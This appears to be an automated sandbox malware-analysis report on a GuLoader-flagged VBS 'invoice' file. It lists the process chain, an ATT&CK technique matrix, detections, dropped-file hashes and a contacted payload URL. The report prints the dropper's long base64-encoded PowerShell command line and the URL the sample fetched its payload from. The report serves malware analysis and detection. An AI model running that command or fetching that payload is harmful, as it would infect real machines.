    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception11
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Query Registry    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Security Software Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)11
    Process Injection    		Security Account Manager1
    Process Discovery    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS21
    Virtualization/Sandbox Evasion    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting    		LSA Secrets1
    Application Window Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials1
    File and Directory Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync12
    System Information Discovery    		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 623396 Sample: WWVN_INVOICE_8363567453.vbs Startdate: 10/05/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected GuLoader 2->26 28 2 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 Wscript starts Powershell (via cmd or directly) 8->30 32 Very long command line found 8->32 34 Encrypted powershell cmdline option found 8->34 11 powershell.exe 22 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\nmk1nqgs.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    WWVN_INVOICE_8363567453.vbs24%ReversingLabsScript.Trojan.Valyria

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    http://barsam.com.au/bin_FCWtLoO90.bin0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://barsam.com.au/bin_FCWtLoO90.bintrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000010.00000002.756793102.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://go.micropowershell.exe, 00000010.00000002.757728131.000000000525D000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:623396
      Start date and time: 10/05/202214:02:152022-05-10 14:02:15 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 49s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:WWVN_INVOICE_8363567453.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winVBS@8/9@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 97%
      • Number of executed functions: 22
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      14:05:13API Interceptor29x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\Hetero3.dat

      Download File
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):58767
      Entropy (8bit):7.381111578760272
      Encrypted:false
      SSDEEP:768:kxehGKqGiOPsqHEA4l7UTJXGJOVFmP2c/7aD+PJL/k2N2788T8NhBrs:kxlK/iOPsmV7J2JCFDZyP1/krQPNfo
      MD5:7F53C5BDB8BE10B4244A89D5B4580B53
      SHA1:A2A3BF3829D0311E3BCC981D98B7FEE88B830055
      SHA-256:13ACE3214FB2EB0AA56526DBEE9510E1ED2B1F1D051D9FAB5FDC7D01DFE964F5
      SHA-512:72FE63679C4522FC5B55D6B593FEDFC0A4025DE6573AF154D86E74352260966B4F2F1C7A389372C04E1846C800BA9A3029D466E72C9BB70E963140C8AA9B287F
      Malicious:false
      Reputation:low
      Preview:......h:....4$.....4$yY.,Z.._1..4.5|..@@@@9.u.W.........5Yy.Zf.^.`.O;.C.+...0.),........c@......l ...^.>...QG7....N...[...ZRjx....v..x_.=..J.n.....T.jcli..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....M..../dX.).I..uE_ba.uyB/....Q.R....e..c.f...i/.._8~.8....[.I.".5.G...`X.T.1&...V...~...(d..h+.3.A..Ri#.j.c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....hS.B...P.IX.....k.......n.~.....p.64...I@.0..5|..5EX....:.|..5...p8.V..~.qDoo........q.......=...uEy....]..h..|.....14|....[.O..i..:v...ur.d[...E.a.g..14|.o;...9.......=.|'ik.|......1.=d..~.5.5..O5|....;Y5|.]m.A.....5.C......}.._}.i~2.|...X.5..=.5.~...=....._......!......L.....O.&.5...4|.<......s..MI.ir.L.j z.i..2@rg.O 6......:.....5|MF.....i.|.K.H*.@SO.1.?...i...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..M^.5.t..xH/.....Z..(K.../|$

      C:\Users\user\AppData\Local\Temp\RESD70A.tmp

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
      Category:dropped
      Size (bytes):1328
      Entropy (8bit):3.9598900643026487
      Encrypted:false
      SSDEEP:24:H5e9EuZfLtleXDfHfhKEbsmfII+ycuZhNb6akSqLPNnq9qd:wBLt0zZKPmg1ulGa3Sq9K
      MD5:0D8D76FA667A3F8B0687A9F384D756B0
      SHA1:8614EC251CE01FB0A370C2EDCA5E634916860355
      SHA-256:2F076029190E1914DB9F290A1DA8A2FA2BCD62752D2E8EB675889B05806CD0D7
      SHA-512:2810D16E67FCA487BBFED7397786E921AEF95FBD7E670111B87F6A88F3EFA35AF2B7F0D29311C5197B8594A87357687F568EF9B7B11B244F2A7458A3B5D5F21F
      Malicious:false
      Reputation:low
      Preview:L....Uzb.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP................4_\e.%.g:4.}.:}...........4.......C:\Users\user\AppData\Local\Temp\RESD70A.tmp.-.<...................'...Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.m.k.1.n.q.g.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ls4gwl5e.umh.ps1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1

      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ux2laugn.p4m.psm1

      Download File
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:very short file (no magic)
      Category:dropped
      Size (bytes):1
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3:U:U
      MD5:C4CA4238A0B923820DCC509A6F75849B
      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
      Malicious:false
      Reputation:high, very likely benign file
      Preview:1

      C:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP

      Download File
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0982348855913746
      Encrypted:false
